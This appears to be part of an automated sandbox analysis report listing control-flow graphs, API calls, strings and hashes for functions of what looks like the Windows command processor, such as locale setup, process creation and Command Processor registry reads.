                                                                                                                                                                        control_flow_graph 398 7ff6e94351ec-7ff6e9435248 call 7ff6e9435508 GetLocaleInfoW 401 7ff6e943524e-7ff6e9435272 GetLocaleInfoW 398->401 402 7ff6e943ef32-7ff6e943ef3c 398->402 403 7ff6e9435274-7ff6e943527a 401->403 404 7ff6e9435295-7ff6e94352b9 GetLocaleInfoW 401->404 405 7ff6e943ef3f-7ff6e943ef49 402->405 406 7ff6e94354f7-7ff6e94354f9 403->406 407 7ff6e9435280-7ff6e9435286 403->407 408 7ff6e94352bb-7ff6e94352c3 404->408 409 7ff6e94352de-7ff6e9435305 GetLocaleInfoW 404->409 410 7ff6e943ef4b-7ff6e943ef52 405->410 411 7ff6e943ef61-7ff6e943ef6c 405->411 406->402 407->406 413 7ff6e943528c-7ff6e943528f 407->413 414 7ff6e94352c9-7ff6e94352d7 408->414 415 7ff6e943ef75-7ff6e943ef78 408->415 416 7ff6e9435307-7ff6e943531b 409->416 417 7ff6e9435321-7ff6e9435343 GetLocaleInfoW 409->417 410->411 412 7ff6e943ef54-7ff6e943ef5f 410->412 411->415 412->405 412->411 413->404 414->409 418 7ff6e943ef99-7ff6e943efa3 415->418 419 7ff6e943ef7a-7ff6e943ef7d 415->419 416->417 420 7ff6e9435349-7ff6e943536e GetLocaleInfoW 417->420 421 7ff6e943efaf-7ff6e943efb9 417->421 418->421 419->409 424 7ff6e943ef83-7ff6e943ef8d 419->424 422 7ff6e9435374-7ff6e9435396 GetLocaleInfoW 420->422 423 7ff6e943eff2-7ff6e943effc 420->423 425 7ff6e943efbc-7ff6e943efc6 421->425 427 7ff6e943539c-7ff6e94353be GetLocaleInfoW 422->427 428 7ff6e943f035-7ff6e943f03f 422->428 426 7ff6e943efff-7ff6e943f009 423->426 424->418 429 7ff6e943efc8-7ff6e943efcf 425->429 430 7ff6e943efde-7ff6e943efe9 425->430 431 7ff6e943f00b-7ff6e943f012 426->431 432 7ff6e943f021-7ff6e943f02c 426->432 433 7ff6e943f078-7ff6e943f082 427->433 434 7ff6e94353c4-7ff6e94353e6 GetLocaleInfoW 427->434 435 7ff6e943f042-7ff6e943f04c 428->435 429->430 436 7ff6e943efd1-7ff6e943efdc 429->436 430->423 431->432 437 7ff6e943f014-7ff6e943f01f 431->437 432->428 442 7ff6e943f085-7ff6e943f08f 433->442 438 7ff6e94353ec-7ff6e943540e GetLocaleInfoW 434->438 439 7ff6e943f0bb-7ff6e943f0c5 434->439 440 7ff6e943f04e-7ff6e943f055 435->440 441 7ff6e943f064-7ff6e943f06f 435->441 436->425 436->430 437->426 437->432 444 7ff6e943f0fe-7ff6e943f108 438->444 445 7ff6e9435414-7ff6e9435436 GetLocaleInfoW 438->445 443 7ff6e943f0c8-7ff6e943f0d2 439->443 440->441 446 7ff6e943f057-7ff6e943f062 440->446 441->433 447 7ff6e943f0a7-7ff6e943f0b2 442->447 448 7ff6e943f091-7ff6e943f098 442->448 449 7ff6e943f0ea-7ff6e943f0f5 443->449 450 7ff6e943f0d4-7ff6e943f0db 443->450 453 7ff6e943f10b-7ff6e943f115 444->453 451 7ff6e943543c-7ff6e943545e GetLocaleInfoW 445->451 452 7ff6e943f141-7ff6e943f14b 445->452 446->435 446->441 447->439 448->447 454 7ff6e943f09a-7ff6e943f0a5 448->454 449->444 450->449 455 7ff6e943f0dd-7ff6e943f0e8 450->455 456 7ff6e9435464-7ff6e9435486 GetLocaleInfoW 451->456 457 7ff6e943f184-7ff6e943f18b 451->457 460 7ff6e943f14e-7ff6e943f158 452->460 458 7ff6e943f117-7ff6e943f11e 453->458 459 7ff6e943f12d-7ff6e943f138 453->459 454->442 454->447 455->443 455->449 462 7ff6e943548c-7ff6e94354ae GetLocaleInfoW 456->462 463 7ff6e943f1c4-7ff6e943f1ce 456->463 461 7ff6e943f18e-7ff6e943f198 457->461 458->459 464 7ff6e943f120-7ff6e943f12b 458->464 459->452 465 7ff6e943f15a-7ff6e943f161 460->465 466 7ff6e943f170-7ff6e943f17b 460->466 468 7ff6e943f19a-7ff6e943f1a1 461->468 469 7ff6e943f1b0-7ff6e943f1bb 461->469 470 7ff6e943f207-7ff6e943f20e 462->470 471 7ff6e94354b4-7ff6e94354f5 setlocale call 7ff6e9438f80 462->471 472 7ff6e943f1d1-7ff6e943f1db 463->472 464->453 464->459 465->466 467 7ff6e943f163-7ff6e943f16e 465->467 466->457 467->460 467->466 468->469 474 7ff6e943f1a3-7ff6e943f1ae 468->474 469->463 473 7ff6e943f211-7ff6e943f21b 470->473 476 7ff6e943f1dd-7ff6e943f1e4 472->476 477 7ff6e943f1f3-7ff6e943f1fe 472->477 478 7ff6e943f21d-7ff6e943f224 473->478 479 7ff6e943f233-7ff6e943f23e 473->479 474->461 474->469 476->477 481 7ff6e943f1e6-7ff6e943f1f1 476->481 477->470 478->479 482 7ff6e943f226-7ff6e943f231 478->482 481->472 481->477 482->473 482->479
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                        • API String ID: 1351325837-2236139042
                                                                                                                                                                        • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                        • Instruction ID: 2ca22a8d62fbf2c1e0eea160f63df73518fe4804e380967333710ee0b07453a0
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 46F15A63B18742D5EF218F35E9143B966A4BF04B84F948135CA0D877A4EF3EE949C30A
                                                                                                                                                                        Function 00007FF6E9434224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 483 7ff6e9434224-7ff6e94342a5 InitializeProcThreadAttributeList 484 7ff6e94342ab-7ff6e94342e5 UpdateProcThreadAttribute 483->484 485 7ff6e943ecd4-7ff6e943ecee GetLastError call 7ff6e9449eec 483->485 486 7ff6e94342eb-7ff6e94343c6 memset * 2 GetStartupInfoW call 7ff6e9433a90 call 7ff6e942b900 484->486 487 7ff6e943ecf0-7ff6e943ed19 GetLastError call 7ff6e9449eec DeleteProcThreadAttributeList 484->487 494 7ff6e943ed1e 485->494 497 7ff6e9434638-7ff6e9434644 _local_unwind 486->497 498 7ff6e94343cc-7ff6e94343d3 486->498 487->494 499 7ff6e9434649-7ff6e9434650 497->499 498->499 500 7ff6e94343d9-7ff6e94343dc 498->500 499->500 503 7ff6e9434656-7ff6e943465d 499->503 501 7ff6e94343de-7ff6e94343f5 wcsrchr 500->501 502 7ff6e9434415-7ff6e9434424 call 7ff6e9435a68 500->502 501->502 504 7ff6e94343f7-7ff6e943440f lstrcmpW 501->504 510 7ff6e9434589-7ff6e9434590 502->510 511 7ff6e943442a-7ff6e9434486 CreateProcessW 502->511 503->502 506 7ff6e9434663 503->506 504->502 507 7ff6e9434668-7ff6e943466d call 7ff6e9449044 504->507 506->500 507->502 510->511 514 7ff6e9434596-7ff6e94345fa CreateProcessAsUserW 510->514 513 7ff6e943448b-7ff6e943448f 511->513 515 7ff6e9434495-7ff6e94344c7 CloseHandle call 7ff6e943498c 513->515 516 7ff6e9434672-7ff6e9434682 GetLastError 513->516 514->513 519 7ff6e943468d-7ff6e9434694 515->519 520 7ff6e94344cd-7ff6e94344e5 515->520 516->519 521 7ff6e9434696-7ff6e94346a0 519->521 522 7ff6e94346a2-7ff6e94346ac 519->522 523 7ff6e94344eb-7ff6e94344f2 520->523 524 7ff6e94347a3-7ff6e94347a9 520->524 521->522 525 7ff6e94346ae-7ff6e94346b5 call 7ff6e94397bc 521->525 522->525 526 7ff6e9434705-7ff6e9434707 522->526 527 7ff6e94344f8-7ff6e9434507 523->527 528 7ff6e94345ff-7ff6e9434607 523->528 541 7ff6e94346b7-7ff6e9434701 call 7ff6e947c038 525->541 542 7ff6e9434703 525->542 526->520 530 7ff6e943470d-7ff6e943472a call 7ff6e942cd90 526->530 531 7ff6e943450d-7ff6e9434553 call 7ff6e9435cb4 call 7ff6e94333f0 call 7ff6e943498c 527->531 532 7ff6e9434612-7ff6e9434616 527->532 528->527 533 7ff6e943460d 528->533 543 7ff6e943472c-7ff6e9434738 _local_unwind 530->543 544 7ff6e943473d-7ff6e9434767 call 7ff6e94313e0 call 7ff6e9449eec call 7ff6e942ff70 _local_unwind 530->544 565 7ff6e9434558-7ff6e943455e 531->565 539 7ff6e94347d7-7ff6e94347df 532->539 540 7ff6e943461c-7ff6e9434633 532->540 538 7ff6e943476c-7ff6e9434773 533->538 538->527 548 7ff6e9434779-7ff6e9434780 538->548 545 7ff6e94347e1-7ff6e94347ed CloseHandle 539->545 546 7ff6e94347f2-7ff6e943483c call 7ff6e942ff70 DeleteProcThreadAttributeList call 7ff6e9438f80 539->546 540->546 541->526 542->526 543->544 544->538 545->546 548->527 553 7ff6e9434786-7ff6e9434789 548->553 553->527 558 7ff6e943478f-7ff6e9434792 553->558 558->524 562 7ff6e9434794-7ff6e943479d call 7ff6e944a250 558->562 562->524 562->527 568 7ff6e94347ae-7ff6e94347ca call 7ff6e94333f0 565->568 569 7ff6e9434564-7ff6e9434579 call 7ff6e943498c 565->569 568->539 569->546 576 7ff6e943457f-7ff6e9434584 call 7ff6e944a920 569->576 576->546
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                                                                        • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                                                                        • API String ID: 388421343-2905461000
                                                                                                                                                                        • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                        • Instruction ID: c024f5d33f1caef2cb71c9703c64383980c643c3d7048c96cf4362f78e1b4b1c
                                                                                                                                                                        • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                        • Instruction Fuzzy Hash: A6F12B73A19A86D6EB60DF21E4443BA77A4FF85B80F404135DA4D82795DF3EE448CB0A
                                                                                                                                                                        Function 00007FF6E9435554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 579 7ff6e9435554-7ff6e94355b9 call 7ff6e943a640 582 7ff6e94355bc-7ff6e94355e8 RegOpenKeyExW 579->582 583 7ff6e9435887-7ff6e943588e 582->583 584 7ff6e94355ee-7ff6e9435631 RegQueryValueExW 582->584 583->582 587 7ff6e9435894-7ff6e94358db time srand call 7ff6e9438f80 583->587 585 7ff6e943f248-7ff6e943f24d 584->585 586 7ff6e9435637-7ff6e9435675 RegQueryValueExW 584->586 589 7ff6e943f260-7ff6e943f265 585->589 590 7ff6e943f24f-7ff6e943f25b 585->590 591 7ff6e9435677-7ff6e943567c 586->591 592 7ff6e943568e-7ff6e94356cc RegQueryValueExW 586->592 589->586 594 7ff6e943f26b-7ff6e943f286 _wtol 589->594 590->586 595 7ff6e943f28b-7ff6e943f290 591->595 596 7ff6e9435682-7ff6e9435687 591->596 597 7ff6e943f2b6-7ff6e943f2bb 592->597 598 7ff6e94356d2-7ff6e9435710 RegQueryValueExW 592->598 594->586 595->592 599 7ff6e943f296-7ff6e943f2b1 _wtol 595->599 596->592 600 7ff6e943f2bd-7ff6e943f2c9 597->600 601 7ff6e943f2ce-7ff6e943f2d3 597->601 602 7ff6e9435729-7ff6e9435767 RegQueryValueExW 598->602 603 7ff6e9435712-7ff6e9435717 598->603 599->592 600->598 601->598 608 7ff6e943f2d9-7ff6e943f2f4 _wtol 601->608 606 7ff6e9435769-7ff6e943576e 602->606 607 7ff6e943579f-7ff6e94357dd RegQueryValueExW 602->607 604 7ff6e943f2f9-7ff6e943f2fe 603->604 605 7ff6e943571d-7ff6e9435722 603->605 604->602 613 7ff6e943f304-7ff6e943f31a wcstol 604->613 605->602 609 7ff6e943f320-7ff6e943f325 606->609 610 7ff6e9435774-7ff6e943578f 606->610 611 7ff6e943f3a9 607->611 612 7ff6e94357e3-7ff6e94357e8 607->612 608->598 614 7ff6e943f327-7ff6e943f33f wcstol 609->614 615 7ff6e943f34b 609->615 616 7ff6e943f357-7ff6e943f35e 610->616 617 7ff6e9435795-7ff6e9435799 610->617 624 7ff6e943f3b5-7ff6e943f3b8 611->624 618 7ff6e94357ee-7ff6e9435809 612->618 619 7ff6e943f363-7ff6e943f368 612->619 613->609 614->615 615->616 616->607 617->607 617->616 622 7ff6e943f39a-7ff6e943f39d 618->622 623 7ff6e943580f-7ff6e9435813 618->623 620 7ff6e943f36a-7ff6e943f382 wcstol 619->620 621 7ff6e943f38e 619->621 620->621 621->622 622->611 623->622 625 7ff6e9435819-7ff6e9435823 623->625 626 7ff6e943582c 624->626 627 7ff6e943f3be-7ff6e943f3c5 624->627 625->624 629 7ff6e9435829 625->629 628 7ff6e9435832-7ff6e9435870 RegQueryValueExW 626->628 630 7ff6e943f3ca-7ff6e943f3d1 626->630 627->628 631 7ff6e9435876-7ff6e9435882 RegCloseKey 628->631 632 7ff6e943f3dd-7ff6e943f3e2 628->632 629->626 630->632 631->583 633 7ff6e943f3e4-7ff6e943f412 ExpandEnvironmentStringsW 632->633 634 7ff6e943f433-7ff6e943f439 632->634 635 7ff6e943f428 633->635 636 7ff6e943f414-7ff6e943f426 call 7ff6e94313e0 633->636 634->631 637 7ff6e943f43f-7ff6e943f44c call 7ff6e942b900 634->637 639 7ff6e943f42e 635->639 636->639 637->631 639->634
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                                                                        • API String ID: 145004033-3846321370
                                                                                                                                                                        • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                        • Instruction ID: fd95c9b61ba7746aaef4a795ddadbf7c456097f6dbde7ea9bbbc61292e6250bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                        • Instruction Fuzzy Hash: 83E1503352DA82C6E750DF60E45467EB7A0FF89740F405135EA8E82A58DF7ED548CB0A
                                                                                                                                                                        Function 00007FF6E94337D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 821 7ff6e94337d8-7ff6e9433887 GetCurrentThreadId OpenThread call 7ff6e94304f4 HeapSetInformation RegOpenKeyExW 824 7ff6e943e9f8-7ff6e943ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff6e943388d-7ff6e94338eb call 7ff6e9435920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff6e943ea41-7ff6e943ea59 GetThreadLocale 824->827 825->827 831 7ff6e94338f1-7ff6e9433913 memset 825->831 829 7ff6e943ea5b-7ff6e943ea67 827->829 830 7ff6e943ea74-7ff6e943ea77 827->830 829->830 834 7ff6e943ea79-7ff6e943ea7d 830->834 835 7ff6e943ea94-7ff6e943ea96 830->835 832 7ff6e9433919-7ff6e9433935 call 7ff6e9434d5c 831->832 833 7ff6e943eaa5 831->833 842 7ff6e943393b-7ff6e9433942 832->842 843 7ff6e943eae2-7ff6e943eaff call 7ff6e9423240 call 7ff6e9448530 call 7ff6e9434c1c 832->843 836 7ff6e943eaa8-7ff6e943eab4 833->836 834->835 838 7ff6e943ea7f-7ff6e943ea89 834->838 835->833 836->832 839 7ff6e943eaba-7ff6e943eac3 836->839 838->835 841 7ff6e943eacb-7ff6e943eace 839->841 844 7ff6e943ead0-7ff6e943eadb 841->844 845 7ff6e943eac5-7ff6e943eac9 841->845 847 7ff6e9433948-7ff6e9433962 _setjmp 842->847 848 7ff6e943eb27-7ff6e943eb40 _setjmp 842->848 854 7ff6e943eb00-7ff6e943eb0d 843->854 844->836 851 7ff6e943eadd 844->851 845->841 853 7ff6e9433968-7ff6e943396d 847->853 847->854 849 7ff6e943eb46-7ff6e943eb49 848->849 850 7ff6e94339fe-7ff6e9433a05 call 7ff6e9434c1c 848->850 856 7ff6e943eb66-7ff6e943eb6f call 7ff6e94301b8 849->856 857 7ff6e943eb4b-7ff6e943eb65 call 7ff6e9423240 call 7ff6e9448530 call 7ff6e9434c1c 849->857 850->824 851->832 859 7ff6e94339b9-7ff6e94339bb 853->859 860 7ff6e943396f 853->860 868 7ff6e943eb15-7ff6e943eb1f call 7ff6e9434c1c 854->868 882 7ff6e943eb87-7ff6e943eb89 call 7ff6e94386f0 856->882 883 7ff6e943eb71-7ff6e943eb82 _setmode 856->883 857->856 863 7ff6e943eb20 859->863 864 7ff6e94339c1-7ff6e94339c3 call 7ff6e9434c1c 859->864 867 7ff6e9433972-7ff6e943397d 860->867 863->848 879 7ff6e94339c8 864->879 869 7ff6e94339c9-7ff6e94339de call 7ff6e942df60 867->869 870 7ff6e943397f-7ff6e9433984 867->870 868->863 869->868 891 7ff6e94339e4-7ff6e94339e8 869->891 870->867 876 7ff6e9433986-7ff6e94339ae call 7ff6e9430580 GetConsoleOutputCP GetCPInfo call 7ff6e94304f4 870->876 897 7ff6e94339b3 876->897 879->869 888 7ff6e943eb8e-7ff6e943ebad call 7ff6e94358e4 call 7ff6e942df60 882->888 883->882 902 7ff6e943ebaf-7ff6e943ebb3 888->902 891->850 895 7ff6e94339ea-7ff6e94339ef call 7ff6e942be00 891->895 899 7ff6e94339f4-7ff6e94339fc 895->899 897->859 899->870 902->850 903 7ff6e943ebb9-7ff6e943ec24 call 7ff6e94358e4 GetConsoleOutputCP GetCPInfo call 7ff6e94304f4 call 7ff6e942be00 call 7ff6e9430580 GetConsoleOutputCP GetCPInfo call 7ff6e94304f4 902->903 903->888
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                        • API String ID: 2624720099-1920437939
                                                                                                                                                                        • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                        • Instruction ID: 9b636658a6d472d51f9caab28fcc224e91bf5d85dc7f3a7623475554e0bcc34c
                                                                                                                                                                        • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                        • Instruction Fuzzy Hash: B5C19F73E08642CAF714EF70A4483B96AA0FF49754F544139DA1EC6B92DE3EA44DC70A
                                                                                                                                                                        Function 00007FF6E943823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1118 7ff6e943823c-7ff6e943829b FindFirstFileExW 1119 7ff6e94382cd-7ff6e94382df 1118->1119 1120 7ff6e943829d-7ff6e94382a9 GetLastError 1118->1120 1124 7ff6e9438365-7ff6e943837b FindNextFileW 1119->1124 1125 7ff6e94382e5-7ff6e94382ee 1119->1125 1121 7ff6e94382af 1120->1121 1122 7ff6e94382b1-7ff6e94382cb 1121->1122 1126 7ff6e943837d-7ff6e9438380 1124->1126 1127 7ff6e94383d0-7ff6e94383e5 FindClose 1124->1127 1128 7ff6e94382f1-7ff6e94382f4 1125->1128 1126->1119 1129 7ff6e9438386 1126->1129 1127->1128 1130 7ff6e9438329-7ff6e943832b 1128->1130 1131 7ff6e94382f6-7ff6e9438300 1128->1131 1129->1120 1130->1121 1132 7ff6e943832d 1130->1132 1133 7ff6e9438332-7ff6e9438353 GetProcessHeap HeapAlloc 1131->1133 1134 7ff6e9438302-7ff6e943830e 1131->1134 1132->1120 1135 7ff6e9438356-7ff6e9438363 1133->1135 1136 7ff6e943838b-7ff6e94383c2 GetProcessHeap HeapReAlloc 1134->1136 1137 7ff6e9438310-7ff6e9438313 1134->1137 1135->1137 1138 7ff6e94450f8-7ff6e944511e GetLastError FindClose 1136->1138 1139 7ff6e94383c8-7ff6e94383ce 1136->1139 1140 7ff6e9438327 1137->1140 1141 7ff6e9438315-7ff6e9438323 1137->1141 1138->1122 1139->1135 1140->1130 1141->1140
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 873889042-0
                                                                                                                                                                        • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                        • Instruction ID: 3ad62b98b4c20e97cd88b956b0bcc23845d5a7d6c44566757cd611abacf289e8
                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                        • Instruction Fuzzy Hash: 855108B7A09B42C6E7108F62A4442BDBBA0FF99B91F449135CA1E83351DF3EE458C709
                                                                                                                                                                        Function 00007FF6E9432978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
